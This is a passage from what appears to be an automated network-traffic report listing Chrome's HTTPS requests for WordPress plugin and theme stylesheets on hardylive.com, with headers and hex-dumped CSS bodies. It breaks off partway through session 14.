                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449749198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC600OUTGET /wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:38 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:36 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 85777
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:38 UTC16179INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 32 30 65 65 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 23 66 63 66 62 66 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 39 65 36 65 64 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 39 35 38 65 30 39 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74
                                                        Data Ascii: @charset "UTF-8";:root{--woocommerce:#720eec;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#720eec;--wc-primary-text:#fcfbfe;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#958e09;--wc-highligh-text
                                                        2025-03-11 18:02:38 UTC16384INData Raw: 64 69 6e 67 3a 30 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 20 6f 75 74 73 69 64 65 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 70 72 6f 64 75 63 74 73 20 75 6c 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 70 72 6f 64 75 63 74 73 20 75 6c 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 70 72 6f 64 75 63 74 73 20 75 6c 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63
                                                        Data Ascii: ding:0;list-style:none outside;clear:both}.woocommerce .products ul::after,.woocommerce .products ul::before,.woocommerce ul.products::after,.woocommerce ul.products::before{content:" ";display:table}.woocommerce .products ul::after,.woocommerce ul.produc
                                                        2025-03-11 18:02:39 UTC16384INData Raw: 2d 63 6f 6c 75 6d 6e 73 3a 31 66 72 20 6d 61 78 2d 63 6f 6e 74 65 6e 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 63 2d 62 6c 6f 63 6b 2d 6f 72 64 65 72 2d 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 2d 61 64 64 69 74 69 6f 6e 61 6c 2d 66 69 65 6c 64 73 2d 77 72 61 70 70 65 72 20 2e 77 63 2d 62 6c 6f 63 6b 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 61 64 64 69 74 69 6f 6e 61 6c 2d 66 69 65 6c 64 73 2d 6c 69 73 74 20 64 74 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a
                                                        Data Ascii: -columns:1fr max-content}.woocommerce .wc-block-order-confirmation-additional-fields-wrapper .wc-block-components-additional-fields-list dt{border-bottom:1px solid rgba(0,0,0,.1);font-style:normal;font-weight:700;padding:1rem;box-sizing:border-box;margin:
                                                        2025-03-11 18:02:39 UTC16384INData Raw: 65 73 29 29 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 65 64 69 74 2d 70 6f 73 74 2d 76 69 73 75 61 6c 2d 65 64 69 74 6f 72 29 29 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 3a 77 68 65 72 65 28 62 6f 64 79 3a 6e 6f 74 28 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 62 6c 6f 63 6b 2d 74 68 65 6d 65 2d 68 61 73 2d 62 75 74 74 6f 6e 2d 73 74 79 6c 65 73 29 29 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 65 64 69 74 2d 70 6f 73 74 2d 76 69 73 75 61 6c 2d 65 64 69 74 6f 72 29 29 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 3a 77 68 65 72 65 28 62 6f 64 79
                                                        Data Ascii: es)):where(:not(.edit-post-visual-editor)) .woocommerce #respond input#submit.alt:disabled,:where(body:not(.woocommerce-block-theme-has-button-styles)):where(:not(.edit-post-visual-editor)) .woocommerce #respond input#submit.alt:disabled:hover,:where(body
                                                        2025-03-11 18:02:39 UTC16384INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 63 61 72 74 5f 74 6f 74 61 6c 73 20 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 73 65 70 61 72 61 74 65 3b 6d 61 72 67 69 6e 3a 30 20 30 20 36 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 61 64 64 5f 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 63 61 72 74 5f 74 6f 74 61 6c 73 20 74 61 62 6c 65 20 74 72 3a 66 69 72 73 74 2d 63 68 69 6c 64 20 74 64 2c 23 61 64 64 5f 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 20 2e 63 61 72 74 5f 74 6f 74 61 6c 73 20 74 61 62 6c 65 20 74 72 3a 66 69 72 73 74 2d 63 68 69
                                                        Data Ascii: e,.woocommerce-checkout .cart-collaterals .cart_totals table{border-collapse:separate;margin:0 0 6px;padding:0}#add_payment_method .cart-collaterals .cart_totals table tr:first-child td,#add_payment_method .cart-collaterals .cart_totals table tr:first-chi
                                                        2025-03-11 18:02:39 UTC4062INData Raw: 72 6d 2d 63 61 72 64 2d 6e 75 6d 62 65 72 2e 61 6d 65 78 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 23 70 61 79 6d 65 6e 74 20 64 69 76 2e 70 61 79 6d 65 6e 74 5f 62 6f 78 20 2e 77 63 2d 63 72 65 64 69 74 2d 63 61 72 64 2d 66 6f 72 6d 2d 63 61 72 64 2d 63 76 63 2e 61 6d 65 78 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 23 70 61 79 6d 65 6e 74 20 64 69 76 2e 70 61 79 6d 65 6e 74 5f 62 6f 78 20 2e 77 63 2d 63 72 65 64 69 74 2d 63 61 72 64 2d 66 6f 72 6d 2d 63 61 72 64 2d 65 78 70 69 72 79 2e 61 6d 65 78 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 20 23 70 61 79 6d 65 6e 74 20 64 69 76 2e 70 61 79 6d 65 6e 74 5f 62 6f 78 20 2e 77 63 2d 63 72 65 64 69 74 2d 63 61 72 64 2d 66 6f 72 6d 2d 63 61 72 64 2d 6e 75 6d 62 65 72 2e
                                                        Data Ascii: rm-card-number.amex,.woocommerce-cart #payment div.payment_box .wc-credit-card-form-card-cvc.amex,.woocommerce-cart #payment div.payment_box .wc-credit-card-form-card-expiry.amex,.woocommerce-cart #payment div.payment_box .wc-credit-card-form-card-number.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.449750198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC598OUTGET /wp-content/plugins/metorik-helper/assets/css/metorik.css?ver=2.0.9 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:39 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:37 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 1750
                                                        Connection: close
                                                        Last-Modified: Fri, 21 Feb 2025 19:55:25 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:39 UTC1750INData Raw: 2f 2a 20 42 61 73 65 20 73 74 79 6c 65 73 20 66 6f 72 20 61 64 64 20 74 6f 20 63 61 72 74 20 2a 2f 0a 2e 6d 65 74 6f 72 69 6b 2d 61 64 64 2d 63 61 72 74 2d 65 6d 61 69 6c 2d 66 6f 72 6d 20 7b 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 33 30 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 38 70 78 20 31 35 70 78 20 32 30 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 7d 0a 0a 2e 6d 65 74 6f 72 69 6b 2d 61 64 64 2d 63 61 72 74 2d 65 6d 61 69 6c 2d 66 6f 72 6d 20 68 33 20 7b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 0a 7d 0a 0a 2e 6d 65 74 6f 72 69 6b 2d 61 64 64 2d 63 61 72 74 2d 65 6d 61 69 6c 2d 66 6f 72 6d 20 2e 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 20 7b 0a 09 63 6f
                                                        Data Ascii: /* Base styles for add to cart */.metorik-add-cart-email-form {max-width: 300px;padding: 18px 15px 20px;text-align: left;}.metorik-add-cart-email-form h3 {font-weight: 600;margin: 0 0 20px;}.metorik-add-cart-email-form .close-button {co


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.449752198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC595OUTGET /wp-content/plugins/woocommerce/assets/css/brands.css?ver=aab4a5 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:39 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:37 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 2279
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:58:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:39 UTC2279INData Raw: 2e 74 61 78 2d 70 72 6f 64 75 63 74 5f 62 72 61 6e 64 20 2e 62 72 61 6e 64 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7a 6f 6f 6d 3a 31 7d 2e 74 61 78 2d 70 72 6f 64 75 63 74 5f 62 72 61 6e 64 20 2e 62 72 61 6e 64 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 69 6d 67 2e 62 72 61 6e 64 2d 74 68 75 6d 62 6e 61 69 6c 7b 77 69 64 74 68 3a 32 35 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 74 61 78 2d 70 72 6f 64 75 63 74 5f 62 72 61 6e 64 20 2e 62 72 61 6e 64 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 2e 74 65 78 74 7b 77 69 64 74 68 3a 37 32 25 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 77 69 64 67 65 74 5f 62 72 61 6e 64 5f 64 65 73 63 72 69 70 74 69 6f 6e 20 69 6d 67 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62
                                                        Data Ascii: .tax-product_brand .brand-description{overflow:hidden;zoom:1}.tax-product_brand .brand-description img.brand-thumbnail{width:25%;float:right}.tax-product_brand .brand-description .text{width:72%;float:left}.widget_brand_description img{box-sizing:border-b


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449751198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC605OUTGET /wp-content/plugins/leaky-paywall//css/issuem-leaky-paywall.css?ver=4.21.7 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:39 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:37 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 13957
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 13:59:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:39 UTC13957INData Raw: 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 20 2a 2f 0d 0a 2e 6c 65 61 6b 79 5f 70 61 79 77 61 6c 6c 5f 6d 65 73 73 61 67 65 5f 77 72 61 70 20 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 6d 61 72 67 69 6e 3a 20 2d 35 65 6d 20 61 75 74 6f 20 32 65 6d 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 20 36 65 6d 20 30 20 30 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 2c 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 35 29 20 30 2e 35 65 6d 2c 20 23 66 66 66 20 35 2e 35 65 6d 2c 20 23 66 66 66 20 31 30 30 25 29 3b 0d 0a 7d 0d 0a 0d 0a 23 6c
                                                        Data Ascii: /* CSS Document */.leaky_paywall_message_wrap {position: relative;width: 100%;margin: -5em auto 2em;padding: 6em 0 0;background: linear-gradient(to bottom, rgba(255,255,255,0), rgba(255,255,255,0.5) 0.5em, #fff 5.5em, #fff 100%);}#l


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449753198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC576OUTGET /wp-content/themes/jnews/style.css?ver=0b25e1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:39 UTC203INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:37 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 427
                                                        Connection: close
                                                        Last-Modified: Tue, 12 Nov 2024 22:55:56 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:39 UTC427INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 4a 4e 65 77 73 0a 56 65 72 73 69 6f 6e 3a 20 31 31 2e 36 2e 36 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 74 68 65 6d 65 66 6f 72 65 73 74 2e 6e 65 74 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 4a 4e 65 77 73 0a 41 75 74 68 6f 72 3a 20 4a 65 67 74 68 65 6d 65 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 6a 65 67 74 68 65 6d 65 2e 63 6f 6d 2f 0a 4c 69 63 65 6e 73 65 3a 20 47 4e 55 20 47 65 6e 65 72 61 6c 20 50 75 62 6c 69 63 20 4c 69 63 65 6e 73 65 20 76 32 2e 30 0a 4c 69 63 65 6e 73 65 20 55 52 49 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6e 75 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 67 70 6c 2d 32 2e 30 2e 68 74 6d 6c 0a 54 61 67 73 3a 20 20 63 75 73 74 6f 6d 2d 62 61 63 6b 67 72
                                                        Data Ascii: /*Theme Name: JNewsVersion: 11.6.6Theme URI: http://themeforest.netDescription: JNewsAuthor: JegthemeAuthor URI: http://jegtheme.com/License: GNU General Public License v2.0License URI: http://www.gnu.org/licenses/gpl-2.0.htmlTags: custom-backgr


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449754198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:38 UTC599OUTGET /wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.27.6 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:39 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:37 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 53269
                                                        Connection: close
                                                        Last-Modified: Fri, 07 Mar 2025 17:59:00 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:39 UTC16179INData Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 37 2e 30 20 2d 20 31 38 2d 30 32 2d 32 30 32 35 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 76 69 73 69 62 69 6c 69 74 79 2d 68 69 64 64 65 6e 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 63 72 65 65 6e 2d 6f 6e 6c 79 2c 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 2c 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 20 73 70 61 6e 2c 2e 75 69 2d 68 65 6c 70 65 72 2d 68 69 64 64 65 6e 2d 61 63 63 65 73 73 69 62 6c 65 7b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70
                                                        Data Ascii: /*! elementor - v3.27.0 - 18-02-2025 */.elementor-hidden{display:none}.elementor-visibility-hidden{visibility:hidden}.elementor-screen-only,.screen-reader-text,.screen-reader-text span,.ui-helper-hidden-accessible{height:1px;margin:-1px;overflow:hidden;p
                                                        2025-03-11 18:02:39 UTC16384INData Raw: 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 6f 72 64 65 72 3a 39 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 6c 61 70 74 6f 70 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 6f 72 64 65 72 3a 38 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 6c 61 70 74 6f 70 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 6f 72 64 65 72 3a 37 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 6c 61 70 74 6f 70 3e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 3e 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 6f 72 64 65 72 3a 36 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 76 65 72 73 65 2d 6c 61 70 74 6f 70
                                                        Data Ascii: >:nth-child(2){order:9}.elementor-reverse-laptop>.elementor-container>:nth-child(3){order:8}.elementor-reverse-laptop>.elementor-container>:nth-child(4){order:7}.elementor-reverse-laptop>.elementor-container>:nth-child(5){order:6}.elementor-reverse-laptop
                                                        2025-03-11 18:02:39 UTC16384INData Raw: 63 6b 67 72 6f 75 6e 64 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 2e 33 73 29 2c 62 6f 72 64 65 72 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 2e 33 73 29 2c 62 6f 78 2d 73 68 61 64 6f 77 20 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 2e 33 73 29 2c 74 72 61 6e 73 66 6f 72 6d 20 76 61 72 28 2d 2d 65 2d 63 6f 6e 2d 74 72 61 6e 73 66 6f 72 6d 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 2e 34 73 29 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 77 69 64 74 68 29 3b 7a 2d 69 6e 64 65 78 3a 76 61 72 28 2d 2d 7a 2d 69 6e 64 65 78 29 3b 2d 2d 66 6c 65 78 2d 77 72 61 70 2d 6d 6f 62 69 6c 65 3a 77 72 61 70 3b 6d 61 72 67 69 6e 2d 62 6c 6f 63 6b 2d 65 6e 64 3a 76 61 72 28 2d 2d 6d 61 72 67 69 6e 2d 62
                                                        Data Ascii: ckground-transition,.3s),border var(--border-transition,.3s),box-shadow var(--border-transition,.3s),transform var(--e-con-transform-transition-duration,.4s);width:var(--width);z-index:var(--z-index);--flex-wrap-mobile:wrap;margin-block-end:var(--margin-b
                                                        2025-03-11 18:02:39 UTC4322INData Raw: 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 78 73 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 6d 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 33 30 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 2d 6c 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 34 30 70 78 7d 2e
                                                        Data Ascii: tor-button.elementor-size-xs{border-radius:2px;font-size:13px;padding:10px 20px}.elementor-button.elementor-size-md{border-radius:4px;font-size:16px;padding:15px 30px}.elementor-button.elementor-size-lg{border-radius:5px;font-size:18px;padding:20px 40px}.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449759198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:41 UTC581OUTGET /wp-content/plugins/newsletter/style.css?ver=8.7.1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
